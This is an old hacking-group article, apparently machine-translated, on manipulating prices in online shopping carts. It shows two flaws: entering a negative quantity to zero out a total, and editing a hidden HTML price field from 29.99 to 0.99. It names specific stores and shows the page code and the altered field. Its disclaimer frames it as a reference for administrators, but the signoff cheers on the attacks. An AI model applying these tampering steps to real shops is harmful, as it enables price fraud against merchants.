|
################################################## ################################
@ @
@ :: LwB Security Team :: @
@ @
################################################## ################################
# -written by durito #
# -e-mail: [email protected] #
# -http: //www.lwbteam.org #
# -date: 28/01/2004 #
# -comments: the information is provided for reference only and is reviewed, #
# As an allowance for administrators.
This article is not #
# Guide to action.
We are not responsible for damage, #
# Perfect readers of this article, and for the illegal #
# Use of information provided by us #
################################################## ################################
- = Manipulation of the price of goods in some shopping trolleys = -
************************************************** ******
Vulnerabilities, which I want to talk about today, are not new, but despite this,
Some new e-commerce systems appearing on the network are subject to them.
I'll start with the old bug, which is that the script of the shopping trolley
Do not filter the symbols of the quantity of the purchased goods.
A vivid example of such vulnerability
We are given a shopping cart with http://www.memoryworld.net.
Suppose that we choose from the product catalog COMPACT FLASH CARD (3.3 / 5V) 128M
- COMPACT FLASH CARD (3.3 / 5V) 128M MEMORY CARD for $ 55.00 for 1 piece.
The goods are in our shopping cart, and we can pay it.
But, let's say, we
Decided to order one more COMPACT FLASH CARD (3.3 / 5V) 128M - COMPACT FLASH
CARD (3.3 / 5V) 128M MEMORY CARD, only now in the quantity window we put
Not 1, but -1.
As a result, the shopping cart in the recalculation of the goods will ask us to pay
$ 55.00 - $ 55.00 = $ 0.00
Like this:
Description Quantity Price Total Price
Peripherals - COMPACT FLASH CARD (3.3 / 5V) 128M - COMPACT FLASH CARD (3.3 / 5V)
128M MEMORY CARD -1 $ 55.00 ($ 55.00)
Peripherals - COMPACT FLASH CARD (3.3 / 5V) 128M - COMPACT FLASH CARD (3.3 / 5V)
128M MEMORY CARD 1 $ 55.00 $ 55.00
Total $ 0.00
Naturally for $ 0.00 no one 2 COMPACT FLASH CARD will not be sent to you, but if you approach
To business competently, in principle, to reduce the price of goods is real.
The second example of a poorly written electronic shopping cart gives us a shop with
Http://ssl.adgrafix.com/cgi-bin/checkitout/checkitout.cgi?theorangSTORE:CKIE:home+
In this case, the price of the product is registered in the hidden fields of the html-code and it can be changed.
Here is a piece of code:
---------------
<TD vAlign = top width = "80%">
<FONT face = Arial, Helvetica color = black> California Valencia Oranges </ FONT>
<INPUT type = hidden value = "California Valencia Oranges" name = name> <BR>
<FONT face = Arial, Helvetica color = black>
<B> $ 29.99 New Low Price Includes Standard S & amp; H. </ B>
<INPUT type = hidden value = "29.99 New Low Price Includes Standard S & amp; H."
Name = price> </ FONT>
<FONT face = Arial, Helvetica color = black size = -1> <BR> <BR>
<FONT face = Arial, Helvetica color = black size = -1> <CENTER>
<FONT color = # 389c38 size = 4>
<B> <FONT color = # ff0000 size = 4>
We will be shipping our CA Valencia Oranges Now through September !!
Order Today !!
</ FONT> </ CENTER> </ B> </ FONT>
----------------
Here is the hidden line with the price:
------
<INPUT type = hidden value = "29.99 New Low Price Includes Standard S & amp; H."
Name = price>
------
It can be forwarded to:
---
<INPUT type = hidden value = "0.99 New Low Price Includes Standard S & amp; H."
Name = price>
And the transaction with such a price passes.
Your bug Durito.
_________________
EAT THE RICH!
| 
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.